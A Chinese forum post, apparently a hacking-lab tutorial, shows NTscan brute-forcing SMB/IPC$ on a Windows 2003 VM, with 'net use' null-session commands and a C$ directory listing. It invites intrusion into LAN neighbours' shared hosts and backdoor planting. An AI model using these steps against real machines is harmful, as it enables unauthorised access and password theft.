NTscan提供主机扫描功能,可以直接在软件输入IP段范围搜索,设置开始地址,设置结束地址,点击开始按钮就可以对该IP段的主机查询,查询结果可以在软件界面显示,方便用户读取主机中的用户密码信息。最关键的是,可以进行445爆破,局域网的小伙伴一旦开启了文件共享,那就可以被NTscan结合字典进行爆破,从而可以直接入侵主机!
附件附赠一个社工密码生成器,可以根据关键信息生成密码字典。
操作:
打开win2003、winXP,还原快照
配置网络在同一局域网,相互可以ping通
下面我们以winXP为主机,攻击win2003服务器
服务器部署
信息扫描
漏洞利用之IPC$:
IPC$俗称“空链接”,是一种没有绝对路径的共享
> IPC$(Internet Process Connection) 是共享 “ 命名管道 “ 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问
我们需要知道管理员的密码,即可建立空链接共享映射,就可以为所欲为了:
net use \\192.168.22.128\ipc$ 密码 /user:用户
对于用户,这里我们就定为administrator(常见管理员账号),密码我们通过暴力破解获取
明白为什么win10默认禁用administrator账号了吧,他是人尽皆知的系统最高权限账号,建议你禁用administrator,或将其改名
暴力破解
建立空链接:
net use \\192.168.22.128\ipc$ 123456 /user:administrator
执行命令
查看C盘目录
C:\>dir \\192.168.22.128\c$
驱动器 \\192.168.22.128\c$ 中的卷没有标签。
卷的序列号是 D4C5-DB9A
\\192.168.22.128\c$ 的目录
2021-10-18 10:38 0 AUTOEXEC.BAT
2021-10-18 10:38 0 CONFIG.SYS
2021-10-18 10:44 Documents and
2021-10-18 10:56 Program Files
2021-10-18 10:37 Program Files
2021-10-18 14:53 toX
2021-10-18 14:52 WINDOWS
2021-10-18 10:38 wmpub
2021-11-04 17:44 26 新建 文本文档
3 个文件 26 字节
6 个目录 6,843,887,616 可用字节
入侵成功,后面就可以留后门等操作
好兄弟,有帮助记得点赞打赏,有来有往,回复可见附件
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-劲夫 | 30.00 | 0 | 2021-12-27 16:04:56 | 活动奖励 |
Track-劲夫 | 60.00 | 0 | 2021-12-27 16:04:48 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
十二梦
发表于 2021-12-28
白嫖怪在此
评论列表
加载数据中...
一抹微笑
发表于 2021-12-28
666
评论列表
加载数据中...
雷婷万钧
发表于 2021-12-30
66666
评论列表
加载数据中...
geniuswuer
发表于 2022-1-22
6666666+
评论列表
加载数据中...
半瓶老醋
发表于 2022-2-17
666888
评论列表
加载数据中...
libin552513
发表于 2022-4-17
666666666666666666
评论列表
加载数据中...
zhang123258
发表于 2022-5-7
1
评论列表
加载数据中...
cxlwmsxyl520
发表于 2022-5-22
333
评论列表
加载数据中...
竹青
发表于 2022-6-20
66
评论列表
加载数据中...
charon
发表于 2022-8-31
让我康康
评论列表
加载数据中...
huangjw428
发表于 2022-10-9
666
评论列表
加载数据中...
feiyaxiao
发表于 2023-5-20
666
评论列表
加载数据中...
19978445189
发表于 2023-5-21
1
评论列表
加载数据中...
lingbi
发表于 2023-6-4
这个看看
评论列表
加载数据中...
wednesday
发表于 2023-6-15
非常好,谢谢了
评论列表
加载数据中...
fivesleep
发表于 2023-11-1
多谢大佬无私的奉献!
评论列表
加载数据中...
263028088
发表于 1个月前
没想到,我这么大岁数的人了,还要学习网络攻防
评论列表
加载数据中...
xuxu
发表于 1个月前
白嫖怪在此白嫖怪在此白嫖怪在此
评论列表
加载数据中...